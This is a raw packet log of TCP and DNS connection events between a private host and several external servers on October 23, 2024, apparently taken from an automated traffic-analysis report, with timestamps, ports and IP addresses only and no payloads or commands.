                                                      Oct 23, 2024 23:29:39.569704056 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.569729090 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.570219040 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.570276976 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.570291042 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.570676088 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.570744038 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.570760012 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.571604013 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.571665049 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.571681023 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.583271027 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.583374977 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.583415031 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.583424091 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.583455086 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.583504915 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.583978891 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.584050894 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.584104061 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.584111929 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.584311962 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.584362984 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.584368944 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.584830046 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.584904909 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.584912062 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.584965944 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.616262913 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.616429090 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.616449118 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.651781082 CEST4434966013.107.246.67192.168.2.16
                                                      Oct 23, 2024 23:29:39.651810884 CEST4434966013.107.246.67192.168.2.16
                                                      Oct 23, 2024 23:29:39.651863098 CEST49660443192.168.2.1613.107.246.67
                                                      Oct 23, 2024 23:29:39.651875973 CEST4434966013.107.246.67192.168.2.16
                                                      Oct 23, 2024 23:29:39.651918888 CEST49660443192.168.2.1613.107.246.67
                                                      Oct 23, 2024 23:29:39.653245926 CEST49660443192.168.2.1613.107.246.67
                                                      Oct 23, 2024 23:29:39.653268099 CEST4434966013.107.246.67192.168.2.16
                                                      Oct 23, 2024 23:29:39.665836096 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.686875105 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.686908007 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.686947107 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.687710047 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.687793970 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.687819004 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.687872887 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.687886953 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.688456059 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.688532114 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.688545942 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.688595057 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.700512886 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.700579882 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.700664997 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.700719118 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.700975895 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.701034069 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.701636076 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.701685905 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.701731920 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.701796055 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.733769894 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.733799934 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.733849049 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.776854992 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.804646015 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.804676056 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.804872036 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.805285931 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.805351019 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.805385113 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.805444956 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.817819118 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.817890882 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.817965984 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.818013906 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.818347931 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.818392038 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.819072962 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.819106102 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.819129944 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.819142103 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.819161892 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.851260900 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.851280928 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.851483107 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.851562023 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.851619005 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.851653099 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.851710081 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.872904062 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.921808004 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.922014952 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.922528028 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.922610998 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.923147917 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.923213959 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.935587883 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.935600042 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.935657024 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.936191082 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.936208010 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.936258078 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.936327934 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.936384916 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.936840057 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.936892033 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.937124014 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.937176943 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.964822054 CEST4434966313.107.246.67192.168.2.16
                                                      Oct 23, 2024 23:29:39.965058088 CEST49663443192.168.2.1613.107.246.67
                                                      Oct 23, 2024 23:29:39.965091944 CEST4434966313.107.246.67192.168.2.16
                                                      Oct 23, 2024 23:29:39.965558052 CEST4434966313.107.246.67192.168.2.16
                                                      Oct 23, 2024 23:29:39.966027021 CEST49663443192.168.2.1613.107.246.67
                                                      Oct 23, 2024 23:29:39.966120958 CEST4434966313.107.246.67192.168.2.16
                                                      Oct 23, 2024 23:29:39.966233015 CEST49663443192.168.2.1613.107.246.67
                                                      Oct 23, 2024 23:29:39.969162941 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.969335079 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.969353914 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.969425917 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.969562054 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.969610929 CEST44349655104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:39.969640017 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:39.969667912 CEST49655443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:40.004110098 CEST44349662184.28.90.27192.168.2.16
                                                      Oct 23, 2024 23:29:40.004237890 CEST49662443192.168.2.16184.28.90.27
                                                      Oct 23, 2024 23:29:40.008338928 CEST49662443192.168.2.16184.28.90.27
                                                      Oct 23, 2024 23:29:40.008354902 CEST44349662184.28.90.27192.168.2.16
                                                      Oct 23, 2024 23:29:40.008701086 CEST44349662184.28.90.27192.168.2.16
                                                      Oct 23, 2024 23:29:40.011326075 CEST4434966313.107.246.67192.168.2.16
                                                      Oct 23, 2024 23:29:40.045613050 CEST49662443192.168.2.16184.28.90.27
                                                      Oct 23, 2024 23:29:40.053334951 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:40.053384066 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:40.053407907 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:40.053421021 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:40.053447008 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:40.053466082 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:40.053709030 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:40.053766012 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:40.053874969 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:40.053932905 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:40.054486036 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:40.054543018 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:40.091330051 CEST44349662184.28.90.27192.168.2.16
                                                      Oct 23, 2024 23:29:40.094952106 CEST4434966313.107.246.67192.168.2.16
                                                      Oct 23, 2024 23:29:40.095103025 CEST4434966313.107.246.67192.168.2.16
                                                      Oct 23, 2024 23:29:40.095175982 CEST49663443192.168.2.1613.107.246.67
                                                      Oct 23, 2024 23:29:40.095793009 CEST49663443192.168.2.1613.107.246.67
                                                      Oct 23, 2024 23:29:40.095812082 CEST4434966313.107.246.67192.168.2.16
                                                      Oct 23, 2024 23:29:40.169867039 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:40.169938087 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:40.170087099 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:40.170145988 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:40.170603991 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:40.170665026 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:40.171226025 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:40.171282053 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:40.171289921 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:40.171328068 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:40.171371937 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:40.171478987 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:40.171490908 CEST44349656104.17.25.14192.168.2.16
                                                      Oct 23, 2024 23:29:40.171518087 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:40.171538115 CEST49656443192.168.2.16104.17.25.14
                                                      Oct 23, 2024 23:29:40.288239002 CEST44349662184.28.90.27192.168.2.16
                                                      Oct 23, 2024 23:29:40.288398027 CEST44349662184.28.90.27192.168.2.16
                                                      Oct 23, 2024 23:29:40.288590908 CEST49662443192.168.2.16184.28.90.27
                                                      Oct 23, 2024 23:29:40.288590908 CEST49662443192.168.2.16184.28.90.27
                                                      Oct 23, 2024 23:29:40.288635015 CEST44349662184.28.90.27192.168.2.16
                                                      Oct 23, 2024 23:29:40.288672924 CEST49662443192.168.2.16184.28.90.27
                                                      Oct 23, 2024 23:29:40.288682938 CEST44349662184.28.90.27192.168.2.16
                                                      Oct 23, 2024 23:29:40.320502996 CEST49676443192.168.2.16184.28.90.27
                                                      Oct 23, 2024 23:29:40.320596933 CEST44349676184.28.90.27192.168.2.16
                                                      Oct 23, 2024 23:29:40.320990086 CEST49676443192.168.2.16184.28.90.27
                                                      Oct 23, 2024 23:29:40.320990086 CEST49676443192.168.2.16184.28.90.27
                                                      Oct 23, 2024 23:29:40.321074963 CEST44349676184.28.90.27192.168.2.16
                                                      Oct 23, 2024 23:29:40.609262943 CEST44349672152.199.21.175192.168.2.16
                                                      Oct 23, 2024 23:29:40.609603882 CEST49672443192.168.2.16152.199.21.175
                                                      Oct 23, 2024 23:29:40.609631062 CEST44349672152.199.21.175192.168.2.16
                                                      Oct 23, 2024 23:29:40.611061096 CEST44349672152.199.21.175192.168.2.16
                                                      Oct 23, 2024 23:29:40.611414909 CEST49672443192.168.2.16152.199.21.175
                                                      Oct 23, 2024 23:29:40.611414909 CEST49672443192.168.2.16152.199.21.175
                                                      Oct 23, 2024 23:29:40.611594915 CEST44349672152.199.21.175192.168.2.16
                                                      Oct 23, 2024 23:29:40.611660004 CEST49672443192.168.2.16152.199.21.175
                                                      Oct 23, 2024 23:29:40.655349016 CEST44349672152.199.21.175192.168.2.16
                                                      Oct 23, 2024 23:29:40.663850069 CEST49672443192.168.2.16152.199.21.175
                                                      Oct 23, 2024 23:29:40.663877010 CEST44349672152.199.21.175192.168.2.16
                                                      Oct 23, 2024 23:29:40.711852074 CEST49672443192.168.2.16152.199.21.175
                                                      Oct 23, 2024 23:29:40.845319986 CEST44349672152.199.21.175192.168.2.16
                                                      Oct 23, 2024 23:29:40.845405102 CEST44349672152.199.21.175192.168.2.16
                                                      Oct 23, 2024 23:29:40.845489979 CEST44349672152.199.21.175192.168.2.16
                                                      Oct 23, 2024 23:29:40.847179890 CEST49672443192.168.2.16152.199.21.175
                                                      Oct 23, 2024 23:29:40.847181082 CEST49672443192.168.2.16152.199.21.175
                                                      Oct 23, 2024 23:29:40.966336012 CEST49678443192.168.2.1620.189.173.10
                                                      Oct 23, 2024 23:29:41.157989979 CEST49672443192.168.2.16152.199.21.175
                                                      Oct 23, 2024 23:29:41.158020020 CEST44349672152.199.21.175192.168.2.16
                                                      Oct 23, 2024 23:29:41.187654972 CEST44349676184.28.90.27192.168.2.16
                                                      Oct 23, 2024 23:29:41.187971115 CEST49676443192.168.2.16184.28.90.27
                                                      Oct 23, 2024 23:29:41.191504002 CEST49676443192.168.2.16184.28.90.27
                                                      Oct 23, 2024 23:29:41.191533089 CEST44349676184.28.90.27192.168.2.16
                                                      Oct 23, 2024 23:29:41.191756964 CEST44349676184.28.90.27192.168.2.16
                                                      Oct 23, 2024 23:29:41.193100929 CEST49676443192.168.2.16184.28.90.27
                                                      Oct 23, 2024 23:29:41.235336065 CEST44349676184.28.90.27192.168.2.16
                                                      Oct 23, 2024 23:29:41.269824028 CEST49678443192.168.2.1620.189.173.10
                                                      Oct 23, 2024 23:29:41.437283993 CEST44349676184.28.90.27192.168.2.16
                                                      Oct 23, 2024 23:29:41.437336922 CEST44349676184.28.90.27192.168.2.16
                                                      Oct 23, 2024 23:29:41.437407017 CEST49676443192.168.2.16184.28.90.27
                                                      Oct 23, 2024 23:29:41.448084116 CEST49676443192.168.2.16184.28.90.27
                                                      Oct 23, 2024 23:29:41.448133945 CEST44349676184.28.90.27192.168.2.16
                                                      Oct 23, 2024 23:29:41.448164940 CEST49676443192.168.2.16184.28.90.27
                                                      Oct 23, 2024 23:29:41.448180914 CEST44349676184.28.90.27192.168.2.16
                                                      Oct 23, 2024 23:29:41.875876904 CEST49678443192.168.2.1620.189.173.10
                                                      Oct 23, 2024 23:29:42.147941113 CEST49673443192.168.2.16204.79.197.203
                                                      Oct 23, 2024 23:29:43.037348986 CEST49679443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:29:43.037437916 CEST4434967920.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:29:43.037539005 CEST49679443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:29:43.038508892 CEST49679443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:29:43.038542986 CEST4434967920.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:29:43.087868929 CEST49678443192.168.2.1620.189.173.10
                                                      Oct 23, 2024 23:29:43.893043995 CEST4434967920.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:29:43.893274069 CEST49679443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:29:43.897176027 CEST49679443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:29:43.897205114 CEST4434967920.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:29:43.897445917 CEST4434967920.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:29:43.939834118 CEST49679443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:29:43.969501019 CEST49679443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:29:44.015341043 CEST4434967920.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:29:44.251852989 CEST4434967920.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:29:44.251897097 CEST4434967920.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:29:44.251904011 CEST4434967920.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:29:44.251919985 CEST4434967920.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:29:44.251986980 CEST4434967920.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:29:44.252073050 CEST49679443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:29:44.252109051 CEST4434967920.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:29:44.252140045 CEST49679443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:29:44.252171040 CEST49679443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:29:44.253314018 CEST4434967920.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:29:44.253388882 CEST49679443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:29:44.253390074 CEST4434967920.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:29:44.255862951 CEST49679443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:29:44.263710022 CEST49679443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:29:44.263751030 CEST4434967920.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:29:44.263778925 CEST49679443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:29:44.263792992 CEST4434967920.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:29:45.438167095 CEST4968080192.168.2.16192.229.211.108
                                                      Oct 23, 2024 23:29:45.501880884 CEST49678443192.168.2.1620.189.173.10
                                                      Oct 23, 2024 23:29:45.741817951 CEST4968080192.168.2.16192.229.211.108
                                                      Oct 23, 2024 23:29:46.145512104 CEST44349635142.250.186.36192.168.2.16
                                                      Oct 23, 2024 23:29:46.145682096 CEST44349635142.250.186.36192.168.2.16
                                                      Oct 23, 2024 23:29:46.145832062 CEST49635443192.168.2.16142.250.186.36
                                                      Oct 23, 2024 23:29:46.348808050 CEST4968080192.168.2.16192.229.211.108
                                                      Oct 23, 2024 23:29:46.685681105 CEST49635443192.168.2.16142.250.186.36
                                                      Oct 23, 2024 23:29:46.685700893 CEST44349635142.250.186.36192.168.2.16
                                                      Oct 23, 2024 23:29:46.897015095 CEST44349628104.20.7.133192.168.2.16
                                                      Oct 23, 2024 23:29:46.897073984 CEST44349628104.20.7.133192.168.2.16
                                                      Oct 23, 2024 23:29:46.897247076 CEST49628443192.168.2.16104.20.7.133
                                                      Oct 23, 2024 23:29:47.559787035 CEST4968080192.168.2.16192.229.211.108
                                                      Oct 23, 2024 23:29:48.695765018 CEST49628443192.168.2.16104.20.7.133
                                                      Oct 23, 2024 23:29:48.695830107 CEST44349628104.20.7.133192.168.2.16
                                                      Oct 23, 2024 23:29:49.973808050 CEST4968080192.168.2.16192.229.211.108
                                                      Oct 23, 2024 23:29:50.309815884 CEST49678443192.168.2.1620.189.173.10
                                                      Oct 23, 2024 23:29:51.761792898 CEST49673443192.168.2.16204.79.197.203
                                                      Oct 23, 2024 23:29:54.774890900 CEST4968080192.168.2.16192.229.211.108
                                                      Oct 23, 2024 23:29:57.651089907 CEST4922653192.168.2.16162.159.36.2
                                                      Oct 23, 2024 23:29:57.656569004 CEST5349226162.159.36.2192.168.2.16
                                                      Oct 23, 2024 23:29:57.656842947 CEST4922653192.168.2.16162.159.36.2
                                                      Oct 23, 2024 23:29:57.662281990 CEST5349226162.159.36.2192.168.2.16
                                                      Oct 23, 2024 23:29:58.266340017 CEST4922653192.168.2.16162.159.36.2
                                                      Oct 23, 2024 23:29:58.272110939 CEST5349226162.159.36.2192.168.2.16
                                                      Oct 23, 2024 23:29:58.272321939 CEST4922653192.168.2.16162.159.36.2
                                                      Oct 23, 2024 23:29:58.321290970 CEST49227443192.168.2.1652.165.164.15
                                                      Oct 23, 2024 23:29:58.321331978 CEST4434922752.165.164.15192.168.2.16
                                                      Oct 23, 2024 23:29:58.321404934 CEST49227443192.168.2.1652.165.164.15
                                                      Oct 23, 2024 23:29:58.321911097 CEST49227443192.168.2.1652.165.164.15
                                                      Oct 23, 2024 23:29:58.321928978 CEST4434922752.165.164.15192.168.2.16
                                                      Oct 23, 2024 23:29:59.576211929 CEST4434922752.165.164.15192.168.2.16
                                                      Oct 23, 2024 23:29:59.576328993 CEST49227443192.168.2.1652.165.164.15
                                                      Oct 23, 2024 23:29:59.578103065 CEST49227443192.168.2.1652.165.164.15
                                                      Oct 23, 2024 23:29:59.578115940 CEST4434922752.165.164.15192.168.2.16
                                                      Oct 23, 2024 23:29:59.578593969 CEST4434922752.165.164.15192.168.2.16
                                                      Oct 23, 2024 23:29:59.580027103 CEST49227443192.168.2.1652.165.164.15
                                                      Oct 23, 2024 23:29:59.623368025 CEST4434922752.165.164.15192.168.2.16
                                                      Oct 23, 2024 23:29:59.729783058 CEST4434922752.165.164.15192.168.2.16
                                                      Oct 23, 2024 23:29:59.730173111 CEST49227443192.168.2.1652.165.164.15
                                                      Oct 23, 2024 23:29:59.730173111 CEST49227443192.168.2.1652.165.164.15
                                                      Oct 23, 2024 23:29:59.730258942 CEST4434922752.165.164.15192.168.2.16
                                                      Oct 23, 2024 23:29:59.730541945 CEST4434922752.165.164.15192.168.2.16
                                                      Oct 23, 2024 23:29:59.730583906 CEST4434922752.165.164.15192.168.2.16
                                                      Oct 23, 2024 23:29:59.730694056 CEST49227443192.168.2.1652.165.164.15
                                                      Oct 23, 2024 23:29:59.730694056 CEST49227443192.168.2.1652.165.164.15
                                                      Oct 23, 2024 23:29:59.746501923 CEST49228443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:29:59.746542931 CEST4434922820.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:29:59.746629000 CEST49228443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:29:59.747040987 CEST49228443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:29:59.747057915 CEST4434922820.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:29:59.909919024 CEST49678443192.168.2.1620.189.173.10
                                                      Oct 23, 2024 23:30:00.602076054 CEST4434922820.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:30:00.602169037 CEST49228443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:30:00.603337049 CEST49228443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:30:00.603343010 CEST4434922820.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:30:00.603681087 CEST4434922820.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:30:00.604686975 CEST49228443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:30:00.651319981 CEST4434922820.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:30:00.770155907 CEST4434922820.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:30:00.770421028 CEST49228443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:30:00.770435095 CEST4434922820.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:30:00.770451069 CEST49228443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:30:00.770581007 CEST4434922820.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:30:00.770622015 CEST4434922820.12.23.50192.168.2.16
                                                      Oct 23, 2024 23:30:00.770684004 CEST49228443192.168.2.1620.12.23.50
                                                      Oct 23, 2024 23:30:01.833576918 CEST49229443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:01.833622932 CEST4434922952.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:01.833736897 CEST49229443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:01.834079027 CEST49229443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:01.834091902 CEST4434922952.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:02.753774881 CEST4434922952.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:02.753865004 CEST49229443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:02.755202055 CEST49229443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:02.755215883 CEST4434922952.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:02.755558014 CEST4434922952.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:02.756937027 CEST49229443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:02.799331903 CEST4434922952.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:03.060750008 CEST4434922952.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:03.060789108 CEST4434922952.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:03.060811043 CEST4434922952.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:03.060911894 CEST49229443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:03.060931921 CEST4434922952.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:03.060980082 CEST49229443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:03.061628103 CEST4434922952.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:03.061698914 CEST49229443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:03.061707973 CEST4434922952.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:03.063936949 CEST49229443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:03.063952923 CEST4434922952.149.20.212192.168.2.16
